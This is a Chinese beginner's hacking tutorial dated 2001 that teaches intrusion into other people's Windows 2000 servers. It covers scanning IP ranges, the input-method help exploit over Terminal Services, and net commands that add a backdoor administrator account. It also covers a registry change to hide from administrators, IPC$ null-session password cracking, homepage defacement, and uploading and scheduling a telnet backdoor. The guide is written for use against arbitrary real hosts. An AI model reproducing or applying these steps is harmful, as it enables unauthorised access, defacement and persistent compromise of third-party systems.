文:snakebin
2001-12
经常有人在QQ上问我怎样入侵一个网站,次数多了就觉得烦了,其实里面要学的东西很多,更不
是一句两句话能概括清楚的,问如何入侵一个网站是极度愚蠢的行为,说要黑一个江湖,或者找
回什么QQ密码的人的想法就更愚蠢,为了让大家对hacker有一个比较全面的认识,在这里介绍一
些最常见的入侵手段,我尽量写的很详细,希望能有助与菜鸟走进黑客的大门,本文过于简单,
不是真正的菜鸟就不用往下看了...
首先强烈推荐你装上win2000以上的操作系统,因为大部分黑客工具都是用win2000开发的,其次
你必须有一个用的顺手的扫描工具,这里使用的以流光IV和superscan为主,以后没有特别做说明
所有软件你都可以到联盟的软件下载区得到。下载好了吗,那么开始吧,先说关于win系列服务器
的入侵,以下介绍的几中方法你能全部结合起来,那么你进一般的服务器没问题了
(一)输入法漏洞入侵
为什么从这里先讲起呢,因为我觉得从这里入门最快,可以激发起你对黑客的兴趣,你也可能在
这里完成你的第一次入侵行动,先到软件区下载终端服务客户端程序,打开superscan,填入一段
你想扫描的IP地址,比如一个C类的地址进行扫描,可以找到很多3389端口开放的主机
下一步打开终端服务客户端程序。填入你扫描到的IP地址,单击连接
连接成功后会跳转到下面的窗口,呵呵,需要用户名和密码才能登陆,咱们马上来创建一个,按键
盘的Ctrl+Shift切换到中文输入法,在输入法工具条上点鼠标右键,然后选择输入法入门,如果
没有,那管理员就是已经打上补丁了,再换一台试试,多找找一定能找到一台有漏洞的服务器
点击后进入输入法帮助,在空白处点鼠标右键,选择跳至连接,填入c:winntsystem32 就是到
这个转目录去
点击显示文件
在目录里随便找到一个可执行的文件,点击鼠标右键,选择创建快捷方式
找到刚才创建的快捷方式,点鼠标右键选择属性,将目标改为:
c:winntsystem32net.exe user hacker 1234 /add
这个DOS命令熟悉吗,意思是创建一个名为hacker密码为1234的新用户,然后点确定,双击刚才改
好的快捷方式,执行它,执行以后可能看不到什么结果,其实已经运行完毕了
这台服务器从此就有了你的用户名,呵呵,别急,这时再对快捷方式点右键,选择属性,将目标
改为
c:winntsystem32net.exe localgroup administrators hacker /add
然后点确定,在双击运行它。意思是将你刚才创建的那个hacker的用户名加到administrators组
中,administrators组是服务器管理员组,这样还有什么做不了呢,最后你回到登陆页面,用刚
才创建的用户名和密码登陆,这台可怜的从此服务器就要多一个主人,强烈建议你不要破坏她,
也不要更改里面的任何设置,因为我觉得现在这种漏洞还是很多,有了这台肉机你可以用他做很
多事,比如:下载文件,上传文件,扫描,等等。如果有心的话你可以帮这台服务器把此漏洞清
除掉,具体方法是在搜索中查找输入法的帮助文件,可以利用的有:PINTLGNT.CHM(微软拼音输
入法),WINSP.CHM(双拼输入法帮助文件),WINZM.CHM(郑码输入法帮助文件),WINPY.CHM
(全拼输入法帮助文件)WINIME.CHM(输入法操作指南)将以上文件全部删除,要想长期使用这台
肉机,你可以修改注册表HKEY_LOCAL_MACHINE---SOFTWARE---Microsoft---Winnt---
CurrentVersion---Winlogon ,找到DontDisplayLastUserName,将键值设置为1 ,这样管理员就
不太容易发现你了。
(二)IPC通道
你可能在用扫描器的时候会扫描到:IPC-> 主机 XX.XX.XX.XX 建立空连接成功,IPC 是什么东东
呢,IPC原先是UNIX的进程间通讯的意思,在这里我们所说的是Win下的IPC,他主要是共享命名管
道的资源,在远程管理计算机和查看计算机的共享资源时都可以用的到,也就是说你可以利用他知
道这台服务器上所有的用户,好了,废话少说,接入正题,首先打开流光IV(怎么?不能使用,
呵呵,装win2000啊,废话啊。win98是游戏平台,当然不能用了:)
点击探测,选择里面的扫描POP3/FTP/NT/SQL主机,在扫描范围里填上起始IP地址和结束IP地址,
找一段美国的IP填上吧:),然后在扫描主机类型里选择NT/98,将底下的选项都打上勾,然后点
确定开始扫描。
不出意外的话,你可以找到很多,确定目标以后,你可以在流光的左方找到的IPC$主机,点击鼠
标右键并选择其中的 探测/探测IPC$用户列表 ,然后选择:仅探测Administrators组的用户,这
样可以节省很多时间,接下来会询问:是否在成功获得用户名后立即开始简单模式探测?,选择
“是”,探测出用户名后,会自动调用字典文件来解密,(里面的字典过于简单,你可以自己制
作更好的字典)
当然你在扫描单IP的时候也很很可能直接扫出用户和密码,这里我们探测出administrators组中
的lixiao的用户名密码为空,见下图蓝色圈内.
这时候我们运行win2000下的cmd.exe,打入命令:
net use IP地址ipc$ “密码” /user: “用户名”
成功连接后显示命令成功完成
找到他的网页所在的目录,如:c:inetpubwwwroot ,用命令:
copy c:index.htm IP地址c$inetpubwwwroot
这里的c:index.htm指的是你作好的网页,上传替换掉原先的文件就可以改他的主页了,如果你
想进一步登陆到他的服务器,那么我们要做的是传一个telnet服务器端上去,将telnet服务打
开,找到流光目录tool文件夹下的sev.exe,将它复制到你的c盘,然后用命令:
copy c:srv.exe IP地址admin$ 意思是把本地C盘的srv.exe上传到服务器的system32目录
下,我们在利用win2000的时间计划来启动这个服务器端,首先要知道对方服务器的所在时间,用
命令:
net time IP地址
可以得到时间
得到系统时间后,我们再用命令:
at IP地址 启动telnet的时间 srv.exe
成功的话显示填加任务完成:
用srv.exe打开的默认端口是99,抽根烟吧,等到时间后,我们就可以用命令:
telnet IP地址 99
远程登陆到服务器上了,成功登陆后,对方服务器的c:winntsystem32目录就在你眼前了
